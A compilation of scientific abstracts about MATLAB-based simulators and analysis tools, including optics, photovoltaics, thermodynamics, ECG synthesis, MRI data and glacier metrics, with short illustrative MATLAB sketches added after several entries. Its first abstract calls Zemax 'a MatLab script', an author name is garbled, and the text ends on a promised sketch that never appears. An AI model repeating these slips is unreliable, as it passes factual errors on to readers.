The PISCES (Prototype Imaging Spectrograph for Coronagraphic Exoplanet Studies) is a lenslet-array-based integral field spectrograph (IFS) designed to advance the technology readiness of the WFIRST (Wide Field Infrared Survey Telescope)-AFTA (Astrophysics Focused Telescope Assets) high-contrast Coronagraph Instrument. We present the end-to-end optical simulator and plans for the data reduction pipeline (DRP). The optical simulator was created with a combination of the IDL (Interactive Data Language)-based PROPER (optical propagation) library and Zemax (a MatLab script), while the data reduction pipeline is a modified version of the Gemini Planet Imager's (GPI) IDL pipeline. The simulations of the propagation of light through the instrument are based on Fourier transform algorithms. The DRP enables transformation of the PISCES IFS data into calibrated spectral data cubes.
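The following MATLAB sketch illustrates the Fourier-transform building block that such propagation codes rest on; it is not part of the PISCES simulator, and the circular pupil and grid sizes are arbitrary illustrative choices:

    % Far-field point spread function (PSF) of a circular aperture via FFT,
    % the basic step in Fourier-transform-based optical propagation.
    N  = 512;                          % grid size (samples)
    x  = linspace(-1, 1, N);
    [X, Y] = meshgrid(x, x);
    aperture = double(sqrt(X.^2 + Y.^2) <= 0.3);   % circular pupil
    field = fftshift(fft2(ifftshift(aperture)));   % Fraunhofer propagation
    psf   = abs(field).^2;
    psf   = psf / max(psf(:));                     % normalize peak to 1
    imagesc(log10(psf + 1e-8)); axis image; colorbar;
    title('log_{10} PSF of a circular aperture (Airy pattern)');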
Adaptive smart simulator for characterization and MPPT construction of PV array
DOE Office of Scientific and Technical Information (OSTI.GOV)
Ouada, Mehdi, E-mail: mehdi.ouada@univ-annaba.org; Meridjet, Mohamed Salah; Dib, Djalel
2016-07-25
Partial shading conditions are among the most important problems in large photovoltaic arrays. Many works in the literature address the modeling, control and optimization of photovoltaic conversion of solar energy under partial shading conditions. The aim of this study is to build a software simulator, analogous to a hardware simulator, that produces a shading pattern of the proposed photovoltaic array, so that the delivered information can be used to obtain an optimal configuration of the PV array and to construct an MPPT algorithm. A graphical user interface (Matlab GUI) was built using a developed script; the tool is easy to use, simple, and responds rapidly. The simulator supports large-array simulations that can be interfaced with MPPT and power electronic converters.
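A minimal MATLAB sketch of the kind of PV model and maximum power point tracking the simulator targets is given below; the single-diode-style curve, its parameter values and the perturb-and-observe (P&O) loop are illustrative assumptions, not the authors' implementation:

    % Simplified PV string model and perturb-and-observe MPPT (illustrative).
    Isc = 8.0; Voc = 37.0; n = 1.3; k = 1.38e-23; q = 1.6e-19; T = 298;
    Ns  = 60;                                   % cells in series
    Vt  = Ns * n * k * T / q;                   % thermal voltage of the string
    I0  = Isc / (exp(Voc/Vt) - 1);              % diode saturation current
    pv  = @(V) max(Isc - I0*(exp(V/Vt) - 1), 0);% panel current vs voltage

    V = 20; dV = 0.2; Pprev = V * pv(V);        % P&O initial operating point
    for step = 1:200
        P = V * pv(V);
        if P < Pprev, dV = -dV; end             % reverse direction if power fell
        Pprev = P;
        V = V + dV;                             % perturb operating voltage
    end
    fprintf('P&O estimate: Vmp ~ %.1f V, Pmp ~ %.1f W\n', V, V*pv(V));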
Computation of thermodynamic equilibrium in systems under stress
NASA Astrophysics Data System (ADS)
Vrijmoed, Johannes C.; Podladchikov, Yuri Y.
2016-04-01
Metamorphic reactions may be partly controlled by the local stress distribution, as suggested by observations of phase assemblages around garnet inclusions related to an amphibolite shear zone in granulite of the Bergen Arcs in Norway. A particular example, presented in fig. 14 of Mukai et al. [1], is discussed here. A garnet crystal embedded in a plagioclase matrix is replaced on the left side by a high-pressure intergrowth of kyanite and quartz and on the right side by chlorite-amphibole. This texture apparently represents disequilibrium. In this case, the minerals adapt to the low-pressure ambient conditions only where fluids were present. Alternatively, here we compute that this particular low-pressure and high-pressure assemblage around a stressed rigid inclusion such as garnet can coexist in equilibrium. To do the computations we developed the Thermolab software package. The core of the software package consists of Matlab functions that generate Gibbs energy of minerals and melts from the Holland and Powell database [2] and aqueous species from the SUPCRT92 database [3]. The most up-to-date solid solutions are included in a general formulation. The user provides a Matlab script to do the desired calculations using the core functions. Gibbs energies of all minerals, solutions and species are benchmarked against THERMOCALC, Perple_X [4] and SUPCRT92 and are reproduced to within computer round-off error. Multi-component phase diagrams have been calculated using Gibbs minimization to benchmark against THERMOCALC and Perple_X. The Matlab script to compute equilibrium in a stressed system needs only two modifications of the standard phase diagram script. Firstly, the Gibbs energy of the phases considered in the calculation is generated for multiple values of thermodynamic pressure. Secondly, for the Gibbs minimization the proportion of the system at each particular thermodynamic pressure needs to be constrained. The user decides which part of the stress tensor is input as thermodynamic pressure. To compute a case of high and low pressure around a stressed inclusion we first did a Finite Element Method (FEM) calculation of a rigid inclusion in a viscous matrix under simple shear. From the computed stress distribution we took the local pressure (mean stress) at each grid point of the FEM calculation. This was used as the input thermodynamic pressure in the Gibbs minimization, and the result showed it is possible to have an equilibrium situation in which chlorite-amphibole is stable in the low-pressure domain and kyanite in the high-pressure domain of the stress field around the inclusion. Interestingly, the calculation predicts the redistribution of fluid from an average fluid content in the system: the fluid in equilibrium tends to accumulate in the low-pressure areas, whereas it leaves the high-pressure areas dry. Transport of fluid components does not necessarily occur by fluid flow, but may happen, for example, by diffusion. We conclude that an apparent disequilibrium texture may be explained by equilibrium under pressure variations, and apparent fluid addition by redistribution of fluid controlled by the local stress distribution. [1] Mukai et al. (2014), Journal of Petrology, 55 (8), p. 1457-1477. [2] Holland and Powell (1998), Journal of Metamorphic Geology, 16, p. 309-343. [3] Johnson et al. (1992), Computers & Geosciences, 18 (7), p. 899-947. [4] Connolly (2005), Earth and Planetary Science Letters, 236, p. 524-541.
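A heavily simplified MATLAB sketch of the constrained Gibbs minimization described above is given below; it is not the Thermolab code, the phase energies and domain fractions are made up, and the linear program uses the Optimization Toolbox function linprog:

    % Gibbs minimization where the system is split between two thermodynamic
    % pressures and the proportion of material at each pressure is constrained.
    gLowP  = [ -10.0; -12.5; -11.0 ];   % molar G of phases A,B,C at low P (kJ)
    gHighP = [  -9.0; -10.5; -13.0 ];   % molar G of phases A,B,C at high P (kJ)
    fLow   = 0.6;                       % fraction of the system at low pressure
    nTot   = 1.0;                       % total moles in the system

    g   = [gLowP; gHighP];              % unknowns: [nA nB nC]@lowP, [nA nB nC]@highP
    Aeq = [1 1 1 0 0 0;                 % material in the low-pressure domain
           0 0 0 1 1 1];                % material in the high-pressure domain
    beq = [fLow*nTot; (1-fLow)*nTot];
    lb  = zeros(6,1);
    n   = linprog(g, [], [], Aeq, beq, lb, []);
    disp(reshape(n, 3, 2))              % stable phase amounts per pressure domain

With these illustrative numbers the minimization keeps a different phase stable in each pressure domain, which is the qualitative behaviour discussed in the abstract.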
Technical development of PubMed interact: an improved interface for MEDLINE/PubMed searches.
Muin, Michael; Fontelo, Paul
2006-11-03
The project aims to create an alternative search interface for MEDLINE/PubMed that may provide assistance to the novice user and added convenience to the advanced user. An earlier version of the project was the 'Slider Interface for MEDLINE/PubMed searches' (SLIM) which provided JavaScript slider bars to control search parameters. In this new version, recent developments in Web-based technologies were implemented. These changes may prove to be even more valuable in enhancing user interactivity through client-side manipulation and management of results. PubMed Interact is a Web-based MEDLINE/PubMed search application built with HTML, JavaScript and PHP. It is implemented on a Windows Server 2003 with Apache 2.0.52, PHP 4.4.1 and MySQL 4.1.18. PHP scripts provide the backend engine that connects with E-Utilities and parses XML files. JavaScript manages client-side functionalities and converts Web pages into interactive platforms using dynamic HTML (DHTML), Document Object Model (DOM) tree manipulation and Ajax methods. With PubMed Interact, users can limit searches with JavaScript slider bars, preview result counts, delete citations from the list, display and add related articles and create relevance lists. Many interactive features occur at client-side, which allow instant feedback without reloading or refreshing the page resulting in a more efficient user experience. PubMed Interact is a highly interactive Web-based search application for MEDLINE/PubMed that explores recent trends in Web technologies like DOM tree manipulation and Ajax. It may become a valuable technical development for online medical search applications.
2014-01-01
Background Various computer-based methods exist for the detection and quantification of protein spots in two-dimensional gel electrophoresis images. Area-based methods are commonly used for spot quantification: an area is assigned to each spot and the sum of the pixel intensities in that area, the so-called volume, is used as a measure of spot signal. Other methods use the optical density, i.e. the intensity of the most intense pixel of a spot, or calculate the volume from the parameters of a fitted function. Results In this study we compare the performance of different spot quantification methods using synthetic and real data. We propose a ready-to-use algorithm for spot detection and quantification that uses fitting of two-dimensional Gaussian function curves for the extraction of data from two-dimensional gel electrophoresis (2-DE) images. The algorithm implements fitting using logical compounds and is computationally efficient. The applicability of the compound fitting algorithm was evaluated for various simulated data and compared with other quantification approaches. We provide evidence that even if an incorrect bell-shaped function is used, the fitting method is superior to other approaches, especially when spots overlap. Finally, we validated the method with experimental data of urea-based 2-DE of Aβ peptides and re-analyzed published data sets. Our methods showed higher precision and accuracy than other approaches when applied to exposure time series and standard gels. Conclusion Compound fitting as a quantification method for 2-DE spots shows several advantages over other approaches and could be combined with various spot detection methods. The algorithm was scripted in MATLAB (Mathworks) and is available as a supplemental file. PMID:24915860
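For orientation, a minimal MATLAB sketch of single-spot quantification by 2-D Gaussian fitting is shown below; it uses base-MATLAB fminsearch on a synthetic spot and is not the published compound-fitting algorithm:

    % Fit a 2-D Gaussian to one synthetic spot and report its analytic volume.
    [X, Y] = meshgrid(1:40, 1:40);
    truth  = [500, 20, 22, 4, 3, 10];           % [A, x0, y0, sx, sy, offset]
    g2d = @(p) p(1)*exp(-((X-p(2)).^2/(2*p(4)^2) + (Y-p(3)).^2/(2*p(5)^2))) + p(6);
    img = g2d(truth) + 5*randn(size(X));        % noisy synthetic spot image
    sse = @(p) sum(sum((g2d(p) - img).^2));     % least-squares objective
    p0  = [max(img(:)), 20, 20, 5, 5, min(img(:))];
    opt = optimset('MaxFunEvals', 2e4, 'MaxIter', 2e4);
    pFit = fminsearch(sse, p0, opt);
    volume = 2*pi*pFit(1)*pFit(4)*pFit(5);      % volume under the fitted Gaussian
    fprintf('Fitted amplitude %.1f, spot volume %.1f\n', pFit(1), volume);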
Simulation Modeling and Performance Evaluation of Space Networks
NASA Technical Reports Server (NTRS)
Jennings, Esther H.; Segui, John
2006-01-01
In space exploration missions, the coordinated use of spacecraft as communication relays increases the efficiency of the endeavors. To conduct trade-off studies of the performance and resource usage of different communication protocols and network designs, JPL designed a comprehensive extendable tool, the Multi-mission Advanced Communications Hybrid Environment for Test and Evaluation (MACHETE). The design and development of MACHETE began in 2000 and is constantly evolving. Currently, MACHETE contains Consultative Committee for Space Data Systems (CCSDS) protocol standards such as Proximity-1, Advanced Orbiting Systems (AOS), Packet Telemetry/Telecommand, Space Communications Protocol Specification (SCPS), and the CCSDS File Delivery Protocol (CFDP). MACHETE uses the Aerospace Corporation's Satellite Orbital Analysis Program (SOAP) to generate the orbital geometry information and contact opportunities. Matlab scripts provide the link characteristics. At the core of MACHETE is a discrete event simulator, QualNet. Delay Tolerant Networking (DTN) is an end-to-end architecture providing communication in and/or through highly stressed networking environments. Stressed networking environments include those with intermittent connectivity, large and/or variable delays, and high bit error rates. To provide its services, the DTN protocols reside at the application layer of the constituent internets, forming a store-and-forward overlay network. The key capabilities of the bundling protocols include custody-based reliability, ability to cope with intermittent connectivity, ability to take advantage of scheduled and opportunistic connectivity, and late binding of names to addresses. In this presentation, we report on the addition of MACHETE models needed to support DTN, namely the Bundle Protocol (BP) model. To illustrate the use of MACHETE with the additional DTN model, we provide an example simulation to benchmark its performance. We demonstrate the use of the DTN protocol and discuss statistics gathered concerning the total time needed to simulate numerous bundle transmissions.
Homaeinezhad, M R; Sabetian, P; Feizollahi, A; Ghaffari, A; Rahmani, R
2012-02-01
The major focus of this study is to present a performance accuracy assessment framework based on mathematical modelling of cardiac system multiple measurement signals. Three mathematical algebraic subroutines with simple structural functions for synthetic generation of the synchronously triggered electrocardiogram (ECG), phonocardiogram (PCG) and arterial blood pressure (ABP) signals are described. In the case of ECG signals, normal and abnormal PQRST cycles in complicated conditions such as fascicular ventricular tachycardia, rate-dependent conduction block and acute Q-wave infarctions of the inferior and anterolateral walls can be simulated. Also, a continuous ABP waveform with corresponding individual events such as systolic, diastolic and dicrotic pressures with normal or abnormal morphologies can be generated by another part of the model. In addition, the mathematical synthetic PCG framework is able to generate the S4-S1-S2-S3 cycles in normal and in cardiac disorder conditions such as stenosis, insufficiency, regurgitation and gallop. In the PCG model, the amplitude and frequency content (5-700 Hz) of each sound and variation patterns can be specified. The three proposed models were implemented to generate artificial signals with various abnormality types and signal-to-noise ratios (SNR), for quantitative detection-delineation performance assessment of several ECG, PCG and ABP individual event detectors designed based on the Hilbert transform, discrete wavelet transform, geometric features such as area curve length (ACLM), the multiple higher order moments (MHOM) metric, and the principal components analysed geometric index (PCAGI). For each method the detection-delineation operating characteristics were obtained automatically in terms of sensitivity, positive predictivity and delineation (segmentation) error rms and checked by the cardiologist. The Matlab m-file scripts of the synthetic ECG, ABP and PCG signal generators are available in the Appendix.
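As a much-reduced illustration of algebraic signal synthesis (not the authors' subroutines), the following MATLAB sketch builds one PQRST cycle from Gaussian kernels with assumed amplitudes, centres and widths:

    % Synthetic ECG beat as a sum of Gaussian kernels (illustrative values).
    fs = 500;                     % sampling rate (Hz)
    t  = 0:1/fs:1;                % one 1-s beat
    % [amplitude (mV), centre (s), width (s)] for the P, Q, R, S and T waves
    w = [ 0.15 0.20 0.025;
         -0.10 0.36 0.010;
          1.00 0.40 0.012;
         -0.25 0.44 0.010;
          0.30 0.65 0.040];
    ecg = zeros(size(t));
    for k = 1:size(w,1)
        ecg = ecg + w(k,1)*exp(-(t - w(k,2)).^2 / (2*w(k,3)^2));
    end
    ecg = ecg + 0.01*randn(size(t));   % measurement noise (SNR knob)
    plot(t, ecg); xlabel('time (s)'); ylabel('amplitude (mV)');
    title('Synthetic ECG beat');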
2014-04-25
EA’s Java application programming interface (API), the team built a tool called OWL2EA that can ingest an OWL file and generate the corresponding UML...ObjectItemStructure specification shown in Figure 10. Running this script in the relational database server MySQL creates the physical schema that
Visualization of Wind Data on Google Earth for the Three-dimensional Wind Field (3DWF) Model
2012-09-01
ActiveX components or XPCOM extensions can be used by JavaScript to write data to the local file system. Since there is an inherent risk, it is very...important to only use these types of objects (ActiveX or XPCOM) from a trusted source in order to minimize the exposure of a computer system to malware
Graphical User Interface for Simulink Integrated Performance Analysis Model
NASA Technical Reports Server (NTRS)
Durham, R. Caitlyn
2009-01-01
The J-2X Engine (built by Pratt & Whitney Rocketdyne), in the Upper Stage of the Ares I Crew Launch Vehicle, will only start within a certain range of temperature and pressure for the Liquid Hydrogen and Liquid Oxygen propellants. The purpose of the Simulink Integrated Performance Analysis Model is to verify that in all reasonable conditions the temperature and pressure of the propellants are within the required J-2X engine start boxes. In order to run the simulation, test variables must be entered at all reasonable values of parameters such as heat leak and mass flow rate. To make this testing process as efficient as possible in order to save the maximum amount of time and money, and to show that the J-2X engine will start when it is required to do so, a graphical user interface (GUI) was created to allow the input of values to be used as parameters in the Simulink Model, without opening or altering the contents of the model. The GUI must allow for test data to come from Microsoft Excel files, allow those values to be edited before testing, place those values into the Simulink Model, and get the output from the Simulink Model. The GUI was built using MATLAB, and will run the Simulink simulation when the Simulate option is activated. After running the simulation, the GUI will construct a new Microsoft Excel file, as well as a MATLAB matrix file, using the output values for each test of the simulation so that they may be graphed and compared to other values.
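A hedged MATLAB sketch of that data flow is given below; the model name, Excel column names and logged output names are hypothetical placeholders, not the actual Simulink Integrated Performance Analysis Model:

    % Read test cases from Excel, run a Simulink model per case, write results back.
    cases = readtable('start_box_cases.xlsx');        % e.g. heat leak, mass flow rate
    nCase = height(cases);
    results = zeros(nCase, 2);                        % [temperature, pressure] at start
    for i = 1:nCase
        in = Simulink.SimulationInput('j2x_start_model');       % hypothetical model name
        in = in.setVariable('heatLeak',     cases.HeatLeak(i));
        in = in.setVariable('massFlowRate', cases.MassFlowRate(i));
        out = sim(in);                                % run the Simulink simulation
        results(i,1) = out.propTemp(end);             % assumed logged outputs; details
        results(i,2) = out.propPress(end);            % depend on the model's logging setup
    end
    writetable([cases, array2table(results, ...
        'VariableNames', {'PropTemp','PropPress'})], 'start_box_results.xlsx');
    save('start_box_results.mat', 'results');         % MATLAB matrix file, as in the text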
DOE Office of Scientific and Technical Information (OSTI.GOV)
DiCostanzo, D; Ayan, A; Woollard, J
Purpose: To automate the daily verification of each patient's treatment by utilizing the trajectory log files (TLs) written by the Varian TrueBeam linear accelerator, while reducing the number of false positives, including jaw and gantry positioning errors, that are displayed in the Treatment History tab of Varian's Chart QA module. Methods: Small deviations in treatment parameters are difficult to detect in weekly chart checks, but may be significant in reducing delivery errors, and would be critical if detected daily. Software was developed in house to read TLs. Multiple functions were implemented within the software that allow it to operate via a GUI to analyze TLs, or as a script to run on a regular basis. In order to determine tolerance levels for the scripted analysis, 15,241 TLs from seven TrueBeams were analyzed. The maximum error of each axis for each TL was written to a CSV file and statistically analyzed to determine the tolerance for each axis accessible in the TLs to flag for manual review. The software/scripts developed were tested by varying the tolerance values to ensure veracity. After tolerances were determined, multiple weeks of manual chart checks were performed simultaneously with the automated analysis to ensure validity. Results: The tolerance values for the major axes were determined to be 0.025 degrees for the collimator, 1.0 degree for the gantry, 0.002 cm for the y-jaws, 0.01 cm for the x-jaws, and 0.5 MU for the MU. The automated verification of treatment parameters has been in clinical use for 4 months. During that time, no errors in machine delivery of the patient treatments were found. Conclusion: The process detailed here is a viable and effective alternative to manually checking treatment parameters during weekly chart checks.
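A minimal MATLAB sketch of the scripted tolerance check is shown below, using the tolerances quoted in the abstract; the CSV layout and column names for the per-axis maximum deviations are assumed for illustration:

    % Flag trajectory logs whose per-axis maximum deviation exceeds tolerance.
    tol = struct('Collimator',0.025, 'Gantry',1.0, 'JawY',0.002, ...
                 'JawX',0.01, 'MU',0.5);            % tolerance per axis
    logData = readtable('daily_max_errors.csv');    % one row per trajectory log (assumed)
    axesList = fieldnames(tol);
    for k = 1:numel(axesList)
        ax  = axesList{k};
        bad = abs(logData.(ax)) > tol.(ax);         % beams exceeding tolerance
        if any(bad)
            fprintf('%d log(s) flagged for manual review on axis %s\n', sum(bad), ax);
        end
    end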
NASA Technical Reports Server (NTRS)
Carpenter, James R.; Berry, Kevin; Gregpru. Late; Speckman, Keith; Hur-Diaz, Sun; Surka, Derek; Gaylor, Dave
2010-01-01
The Orbit Determination Toolbox is an orbit determination (OD) analysis tool based on MATLAB and Java that provides a flexible way to do early mission analysis. The toolbox is primarily intended for advanced mission analysis such as might be performed in concept exploration, proposal, early design phase, or rapid design center environments. The emphasis is on flexibility, but it has enough fidelity to produce credible results. Insight into all flight dynamics source code is provided. MATLAB is the primary user interface and is used for piecing together measurement and dynamic models. The Java Astrodynamics Toolbox is used as an engine for things that might be slow or inefficient in MATLAB, such as high-fidelity trajectory propagation, lunar and planetary ephemeris look-ups, precession, nutation, polar motion calculations, ephemeris file parsing, and the like. The primary analysis functions are sequential filter/smoother and batch least-squares commands that incorporate Monte-Carlo data simulation, linear covariance analysis, measurement processing, and plotting capabilities at the generic level. These functions have a user interface that is based on that of the MATLAB ODE suite. To perform a specific analysis, users write MATLAB functions that implement truth and design system models. The user provides his or her models as inputs to the filter commands. The software provides a capability to publish and subscribe to a software bus that is compliant with the NASA Goddard Mission Services Evolution Center (GMSEC) standards, to exchange data with other flight dynamics tools to simplify the flight dynamics design cycle. Using the publish and subscribe approach allows for analysts in a rapid design center environment to seamlessly incorporate changes in spacecraft and mission design into navigation analysis and vice versa.
ISMRM Raw data format: A proposed standard for MRI raw datasets.
Inati, Souheil J; Naegele, Joseph D; Zwart, Nicholas R; Roopchansingh, Vinai; Lizak, Martin J; Hansen, David C; Liu, Chia-Ying; Atkinson, David; Kellman, Peter; Kozerke, Sebastian; Xue, Hui; Campbell-Washburn, Adrienne E; Sørensen, Thomas S; Hansen, Michael S
2017-01-01
This work proposes the ISMRM Raw Data format as a common MR raw data format, which promotes algorithm and data sharing. A file format consisting of a flexible header and tagged frames of k-space data was designed. Application Programming Interfaces were implemented in C/C++, MATLAB, and Python. Converters for Bruker, General Electric, Philips, and Siemens proprietary file formats were implemented in C++. Raw data were collected using magnetic resonance imaging scanners from four vendors, converted to ISMRM Raw Data format, and reconstructed using software implemented in three programming languages (C++, MATLAB, Python). Images were obtained by reconstructing the raw data from all vendors. The source code, raw data, and images comprising this work are shared online, serving as an example of an image reconstruction project following a paradigm of reproducible research. The proposed raw data format solves a practical problem for the magnetic resonance imaging community. It may serve as a foundation for reproducible research and collaborations. The ISMRM Raw Data format is a completely open and community-driven format, and the scientific community is invited (including commercial vendors) to participate either as users or developers. Magn Reson Med 77:411-421, 2017. © 2016 Wiley Periodicals, Inc.
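As a generic illustration of the reconstruction step (not the ISMRM Raw Data API itself), the following MATLAB sketch turns multi-coil Cartesian k-space, assumed already read from a raw data file, into a root-sum-of-squares image:

    % Simple Cartesian reconstruction from multi-coil k-space data.
    kspace = randn(256, 256, 8) + 1i*randn(256, 256, 8);   % placeholder [kx, ky, coil]
    coilImgs = zeros(size(kspace));
    for c = 1:size(kspace, 3)
        coilImgs(:,:,c) = fftshift(ifft2(ifftshift(kspace(:,:,c))));
    end
    img = sqrt(sum(abs(coilImgs).^2, 3));                  % root-sum-of-squares combine
    imagesc(img); axis image; colormap gray; title('RSS reconstruction');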
MEA-Tools: an open source toolbox for the analysis of multi-electrode data with MATLAB.
Egert, U; Knott, Th; Schwarz, C; Nawrot, M; Brandt, A; Rotter, S; Diesmann, M
2002-05-30
Recent advances in electrophysiological techniques have created new tools for the acquisition and storage of neuronal activity recorded simultaneously with numerous electrodes. These techniques support the analysis of the function as well as the structure of individual electrogenic cells in the context of the surrounding neuronal or cardiac network. Commercially available tools for the analysis of such data, however, cannot be easily adapted to newly emerging requirements for data analysis and visualization, and cross-compatibility between them is limited. In this report we introduce a free open source toolbox called microelectrode array tools (MEA-Tools) for the analysis of multi-electrode data based on the common data analysis environment MATLAB (versions 5.3-6.1, The Mathworks, Natick, MA). The toolbox itself is platform independent. The file interface currently supports files recorded with MCRack (Multi Channel Systems, Reutlingen, Germany) under Microsoft Windows 95, 98, NT, and 2000, but can be adapted to other data acquisition systems. Functions are controlled via command line input and graphical user interfaces, and support common requirements for the analysis of local field potentials, extracellular spike activity, and continuous recordings, in addition to supplementary data acquired by additional instruments, e.g. intracellular amplifiers. Data may be processed as continuous recordings or time windows triggered to some event.
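A small MATLAB sketch of the kind of spike-extraction step such toolboxes support is shown below; it is not a MEA-Tools function, and the synthetic channel, spike shape and threshold rule are illustrative assumptions:

    % Threshold-based spike detection on one synthetic extracellular channel.
    fs = 25000;                              % sampling rate (Hz)
    t  = 0:1/fs:1;
    sig = 10*randn(size(t));                 % background noise (microvolts)
    spikeTimes = [0.12 0.37 0.61 0.88];      % ground-truth spikes for the demo
    for st = spikeTimes
        idx = round(st*fs) + (0:30);
        sig(idx) = sig(idx) - 80*exp(-(0:30)/8);   % add negative-going spikes
    end
    thr = -5 * median(abs(sig)) / 0.6745;    % robust noise-scaled threshold
    above  = sig < thr;
    onsets = find(diff([0 above]) == 1);     % first sample of each threshold crossing
    fprintf('Detected %d spikes at t = %s s\n', numel(onsets), mat2str(t(onsets), 3));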
Design Automation Using Script Languages. High-Level CAD Templates in Non-Parametric Programs
NASA Astrophysics Data System (ADS)
Moreno, R.; Bazán, A. M.
2017-10-01
The main purpose of this work is to study the advantages offered by the application of traditional techniques of technical drawing in processes for automation of the design, with non-parametric CAD programs provided with scripting languages. Given that an example drawing can be solved with traditional step-by-step detailed procedures, it is possible to do the same with CAD applications and to generalize it later, incorporating references. In today's modern CAD applications, there are striking absences of solutions for building engineering: oblique projections (military and cavalier), 3D modelling of complex stairs, roofs, furniture, and so on. The use of geometric references (using variables in script languages) and their incorporation into high-level CAD templates allows the automation of processes. Instead of repeatedly creating similar designs or modifying their data, users should be able to use these templates to generate future variations of the same design. This paper presents the automation process of several complex drawing examples based on CAD script files aided with parametric geometry calculation tools. The proposed method allows us to solve complex geometry designs not currently incorporated in CAD applications and to subsequently create other new derivatives without user intervention. Automation in the generation of complex designs not only saves time but also increases the quality of the presentations and reduces the possibility of human errors.
NASA Technical Reports Server (NTRS)
Pototzky, Anthony S.
2010-01-01
A methodology is described for generating first-order plant equations of motion for aeroelastic and aeroservoelastic applications. The description begins with the process of generating data files representing specialized mode-shapes, such as rigid-body and control surface modes, using both PATRAN and NASTRAN analysis. NASTRAN executes the 146 solution sequence using numerous Direct Matrix Abstraction Program (DMAP) calls to import the mode-shape files and to perform the aeroelastic response analysis. The aeroelastic response analysis calculates and extracts structural frequencies, generalized masses, frequency-dependent generalized aerodynamic force (GAF) coefficients, sensor deflections and load coefficients data as text-formatted data files. The data files are then re-sequenced and re-formatted using a custom written FORTRAN program. The text-formatted data files are stored and coefficients for s-plane equations are fitted to the frequency-dependent GAF coefficients using two Interactions of Structures, Aerodynamics and Controls (ISAC) programs. With tabular files from stored data created by ISAC, MATLAB generates the first-order aeroservoelastic plant equations of motion. These equations include control-surface actuator, turbulence, sensor and load modeling. Altitude varying root-locus plot and PSD plot results for a model of the F-18 aircraft are presented to demonstrate the capability.
INSPIRE and SPIRES Log File Analysis
DOE Office of Scientific and Technical Information (OSTI.GOV)
Adams, Cole; /Wheaton Coll. /SLAC
2012-08-31
SPIRES, an aging high-energy physics publication database, is in the process of being replaced by INSPIRE. In order to ease the transition from SPIRES to INSPIRE it is important to understand user behavior and the drivers for adoption. The goal of this project was to address some questions regarding the presumed two-thirds of the users still using SPIRES. These questions are answered through analysis of the log files from both websites. A series of scripts were developed to collect and interpret the data contained in the log files. Common search patterns and usage comparisons are made between INSPIRE and SPIRES, and a method for detecting user frustration is presented. The analysis reveals a more even split than originally thought, as well as the expected trend of user transition to INSPIRE.
PDB explorer -- a web based algorithm for protein annotation viewer and 3D visualization.
Nayarisseri, Anuraj; Shardiwal, Rakesh Kumar; Yadav, Mukesh; Kanungo, Neha; Singh, Pooja; Shah, Pratik; Ahmed, Sheaza
2014-12-01
The PDB file format is a text format characterizing the three-dimensional structures of macromolecules available in the Protein Data Bank (PDB). Determined protein structures are often found in association with other molecules or ions such as nucleic acids, water, ions, drug molecules and so on, which can therefore be described in the PDB format and have been deposited in the PDB database. A PDB file is machine-generated and not in a human-readable format; a computational tool is needed to read and understand it. The objective of our present study is to develop free online software for the retrieval, visualization and reading of the annotation of a protein 3D structure available in the PDB database. The main aim is to present the PDB file in a human-readable format, i.e., the information in the PDB file is converted into readable sentences. It displays all possible information from a PDB file, including the 3D structure of that file. Programming languages and scripting languages like Perl, CSS, JavaScript, Ajax, and HTML have been used for the development of PDB Explorer. The PDB Explorer directly parses the PDB file, calling methods for each parsed element: secondary structure elements, atoms, coordinates, etc. PDB Explorer is freely available at http://www.pdbexplorer.eminentbio.com/home, with no log-in required.
Rodríguez, J; Premier, G C; Dinsdale, R; Guwy, A J
2009-01-01
Mathematical modelling in environmental biotechnology has traditionally been a difficult resource to access for researchers and students without programming expertise. The great degree of flexibility required from model implementation platforms to be suitable for research applications restricts their use to expert programmers. More user-friendly software packages, however, do not normally incorporate the flexibility necessary for most research applications. This work presents a methodology based on Excel and Matlab-Simulink for both flexible and accessible implementation of mathematical models by researchers with and without programming expertise. The models are almost fully defined in an Excel file in which the names and values of the state variables and parameters are easily created. This information is automatically processed in Matlab to create the model structure, and almost immediate model simulation is possible after only a minimal Matlab code definition. The proposed framework also provides expert programmers with a highly flexible and modifiable platform on which to base more complex model implementations. The method takes advantage of structural generalities in most mathematical models of environmental bioprocesses while enabling the integration of advanced elements (e.g. heuristic functions, correlations). The methodology has already been successfully used in a number of research studies.
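A hedged MATLAB sketch of the general idea is shown below; the Excel file layout, sheet and column names, and the Monod-type rate expressions are our own assumptions rather than the authors' template:

    % States and parameters defined in Excel, turned into a generic ODE simulation.
    states = readtable('model.xlsx', 'Sheet', 'States');      % columns: Name, Initial
    params = readtable('model.xlsx', 'Sheet', 'Parameters');  % columns: Name, Value
    p  = cell2struct(num2cell(params.Value), params.Name, 1); % parameters by name
    x0 = states.Initial;

    % Only the rate expressions need hand-written code; here a simple
    % substrate/biomass pair (Monod growth) stands in for the real model.
    rhs = @(t, x) [ -p.qmax * x(1)/(p.Ks + x(1)) * x(2);        % substrate
                     p.Y * p.qmax * x(1)/(p.Ks + x(1)) * x(2)]; % biomass
    [tSim, xSim] = ode45(rhs, [0 24], x0);
    plot(tSim, xSim); legend(states.Name); xlabel('time (h)');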
NASA Astrophysics Data System (ADS)
Lea, J.
2017-12-01
The quantification of glacier change is a key variable in glacier monitoring, and the method used can be crucial to ensuring that the data can be appropriately compared with environmental data. The topic and timescales of study (e.g. land/marine-terminating environments; sub-annual/decadal/centennial/millennial timescales) often mean that different methods are more suitable for different problems. However, depending on the GIS/coding expertise of the user, some methods can be time consuming to undertake, making large-scale studies problematic. In addition, examples exist where different users have nominally applied the same methods in different studies, though with minor methodological inconsistencies in their approach. In turn, this has implications for data homogeneity where regional/global datasets may be constructed. Here, I present a simple toolbox scripted in a Matlab® environment that requires only glacier margin and glacier centreline data to quantify glacier length, glacier change between observations, and rate of change, in addition to other metrics. The toolbox includes the option to apply the established centreline or curvilinear box methods, or a new method, the variable box method, designed for tidewater margins, where box width is defined as the total width of the individual terminus observation. The toolbox is extremely flexible and can be applied either as Matlab® functions within user scripts or via a graphical user interface (GUI) for those unfamiliar with a coding environment. In both instances, the methods can potentially be applied quickly to large datasets (100s-1000s of glaciers, with potentially similar numbers of observations each), thus ensuring large-scale methodological consistency (and therefore data homogeneity) and allowing regional/global-scale analyses to be achievable for those with limited GIS/coding experience. The toolbox has been evaluated against idealised scenarios demonstrating its accuracy, while feedback from undergraduate students who have trialled the toolbox is that it is intuitive and simple to use. When released, the toolbox will be free and open source, allowing users to potentially modify, improve and expand upon the current version.
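As a minimal illustration of the centreline idea (not the toolbox itself), the following MATLAB sketch measures glacier length as cumulative distance along a centreline and reports the change between two digitised terminus positions; the coordinates, the nearest-vertex approximation and the time interval are assumed:

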